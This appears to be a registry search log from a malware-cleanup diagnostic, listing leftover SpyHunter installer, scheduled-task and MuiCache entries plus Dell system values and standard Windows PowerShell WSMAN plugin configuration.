[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"

Searching for "        "
[HKEY_LOCAL_MACHINE\SOFTWARE\Dell Computer Corporation\SysInfo]
"System Manufacturer"="Dell Inc.        "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML"="            <PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" >                <InitializationParameters>                    <Param Name="PSVersion" Value="2.0"/>                </InitializationParameters>                <Resources>                    <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" SupportsOptions="true" ExactMatch="true">                        <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                        <Capability Type="Shell"/>                    </Resource>                </Res
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell32]
"ConfigXML"="<PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell32" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" Architecture="32" >                        <InitializationParameters>                            <Param Name="PSVersion" Value="2.0"/>                        </InitializationParameters>                        <Resources>                            <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" SupportsOptions="true" ExactMatch="true">                                <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                               
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Live\Common]
"Manufacturer"="Dell Inc.        "

-= EOF =-


